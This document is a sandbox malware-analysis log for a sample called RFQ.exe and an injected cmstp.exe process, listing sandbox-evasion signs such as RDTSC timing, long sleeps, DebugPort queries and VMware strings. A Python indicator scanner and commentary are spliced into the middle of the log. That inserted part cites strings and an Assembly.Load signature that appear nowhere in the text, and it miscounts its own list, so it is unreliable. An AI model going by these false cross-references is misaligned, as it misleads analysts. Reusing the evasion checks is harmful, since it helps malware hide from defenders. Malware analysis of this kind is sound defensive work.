Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 0000000002D298E4 second address: 0000000002D298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 0000000002D29B4E second address: 0000000002D29B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00409A80 rdtsc
Source: C:\Users\user\Desktop\RFQ.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\RFQ.exe TID: 6528 | Thread sleep time: -41500s >= -30000s
Source: C:\Users\user\Desktop\RFQ.exe TID: 6544 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6360 | Thread sleep count: 33 > 30
Source: C:\Windows\explorer.exe TID: 6360 | Thread sleep time: -66000s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe TID: 3412 | Thread sleep time: -65000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed (2 identical entries)
Source: explorer.exe, 00000002.00000000.255728761.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.255728761.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000002.00000000.256035908.00000000088C3000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.255528652.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.255258920.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000002.00000000.247683405.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: explorer.exe, 00000002.00000000.255728761.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000002.00000000.255728761.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.255798043.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000002.00000002.498238237.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.255258920.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.255258920.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000002.00000000.255258920.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
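The RFQ.exe memory strings above (SBIEDLL.DLL, WINE_GET_UNIX_FILE_NAME, the VMware Tools registry key and install path, the VMware SVGA II adapter name) are the artifacts the sample looks for. The following is an added example written for this page, not code from the report or from the sample: a scanner that looks for those indicators in a memory dump. Because the sample is a .NET executable (see the Assembly.Load signature above), its strings sit in memory as UTF-16LE and a plain ASCII search misses them, so both encodings are tried. SAMPLE_DUMP is constructed for the demonstration.

```python
# Indicator strings taken from the "Binary or memory string" lines above.
INDICATORS = [
    "SBIEDLL.DLL",                                # Sandboxie's user-mode DLL
    "WINE_GET_UNIX_FILE_NAME",                    # export present only in Wine's kernel32
    "SOFTWARE\\VMware, Inc.\\VMware Tools",       # VMware Tools registry key
    "C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\",  # VMware Tools install path
    "VMware SVGA II",                             # VMware display adapter name
]


def scan_dump(dump: bytes, indicators=INDICATORS):
    """Return (indicator, encoding, offset) for every case-insensitive hit, by offset."""
    # bytes.lower() folds ASCII letters only; the 0x00 high bytes of UTF-16LE
    # text are untouched, so one lowered copy serves both encodings.
    low = dump.lower()
    hits = []
    for s in indicators:
        for label, codec in (("ascii", "ascii"), ("utf-16le", "utf-16-le")):
            needle = s.lower().encode(codec)
            start = 0
            while (idx := low.find(needle, start)) != -1:
                hits.append((s, label, idx))
                start = idx + 1
    return sorted(hits, key=lambda h: h[2])


# Constructed dump: one UTF-16LE indicator as a .NET string would appear, one
# ASCII registry path, and one UTF-16LE indicator in a different letter case.
SAMPLE_DUMP = (
    b"\x00" * 16
    + "SBIEDLL.DLL".encode("utf-16-le")
    + b"\x00" * 8
    + b"SOFTWARE\\VMware, Inc.\\VMware Tools"
    + b"\x00" * 4
    + "vmware svga ii".encode("utf-16-le")
    + b"\x00" * 2
)

if __name__ == "__main__":
    for indicator, encoding, offset in scan_dump(SAMPLE_DUMP):
        print(f"{offset:#08x} {encoding:8} {indicator}")
```

The same three strings in a YARA rule need the `ascii wide nocase` modifiers to cover what this scanner covers; a rule written with bare `ascii` strings reports nothing on a managed process dump.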
          Source: C:\Users\user\Desktop\RFQ.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00409A80 rdtsc 1_2_00409A80
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040ACC0 LdrLoadDll,1_2_0040ACC0
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E36CF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E88CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h] (13 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h] (11 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h] (12 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E4C450 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DE3C3E mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h] (14 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E8740D mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E36C0A mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E7FDE2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E36DC9 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E36DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DCD5E0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E805AC mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DEFD9B mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DB2D8A mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DE2581 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E72D82 mov eax, dword ptr fs:[00000030h] (7 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DE1DB5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DF3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E63D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DDC577 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E7E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DE4D3B mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h] (13 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DBAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DEF527 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DE36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DF8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E6FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E88ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DE16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DC76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E80EA5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E4FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DC7E41 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E7AE44 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DDAE73 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DC766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DEA61C mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04E6FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DBC600 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]